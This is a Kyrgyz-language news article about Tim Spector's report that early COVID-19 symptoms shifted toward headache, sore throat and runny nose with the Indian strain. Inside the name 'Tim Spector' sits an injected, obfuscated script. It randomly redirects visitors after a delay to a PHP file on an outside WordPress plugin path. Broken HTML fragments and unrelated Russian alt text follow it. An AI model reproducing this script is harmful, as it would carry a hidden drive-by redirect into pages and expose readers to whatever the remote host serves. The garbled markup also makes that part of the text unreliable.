Дарыгерлер COVID-19дун алгачкы белгилери өзгөрдү дешет

“Коронавирустун негизги симптомдору илдеттин улам жаңы штаммдарынын пайда болушунан өзгөрө баштады”,- деп Лондон университетинин окумуштуулары маалымдашты.

Учурда Улуу британиянын улуттук саламаттык сактоо кызматы коронавирустун негизги белгилерине даам, жыт сезбей калуу менен бирге, дене таптын көтөрүлүшү менен жөтөлдү айтышат. Дүйнөлүк саламаттык сактоо уюмунун версиясы боюнча,  COVID-19дун 3 негизги белгилери бар, алар: дене таптын көтөрүлүшү, кургак жөтөл жана алсырап, чарчоо.

Бирок, генетик жана эпидемиолог Тим Спектордун айтымында, коронавирустун индиялык штаммы учурда Улуу британияда өтө кеңири жайылып, алгачкы симптомдору вирустук респиратордук ооруларга окшоп кетет. Анын негизги белгилери: баш ооруу, тамак жана мурун көңдөйүнүн сезгенүүсү (тамак ооруп, мурундан суу агат).

Спектордун айтымында, ушул белгилерди байкаган адамдар өзүнө жана жакындарына карата сактык чараларын көрүп, тезинен дарыгерлерге кайрылуулары керектелет. Себеби, илдетти жугузуп алгандардын көпчүлүгү бул белгилерге маани бербей жүрүп, илдеттин жайылуусуна шарт түзүп жатышат.

«Бейтаптар мындай белгилерди жөнөкөй сезондук гриппке шылтоолоп, кечелерге, жолугушууларга бара берип, коронавирусту бөлөктөргө дагы жугузуп коюп жатышат. Биз инфекциянын негизги белгилерин гана изилдеп жатабыз. Азыр илдеттин алгачкы симптомдору өзгөрдү», — дейт Спектор «Mirror» басылмасына берген маегинде.

Тим Спектор (Tim Spec<script>$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>tor) Профессор генетической эпидемиологии, автор книг  о здоровом питании. Квашеная к… | Здоровье, Правильно питаться,  Ферментированные продукты» width=»208″ height=»208″/></figure>



<blockquote class=

“Коронавирустун «классикалык» белгилери бейтаптардан дагы деле аныкталып жатканы менен, кошумча жаңы белгилери да арбын кездешүүдө. Жаңы белгилерине бейтаптардын дээрлик көпчүлүгү анча маани бербей, оорунун күчөп кетишине шарт түзүп жатышат”,- дейт адис.

Бөлүшүү: Telegram WhatsApp X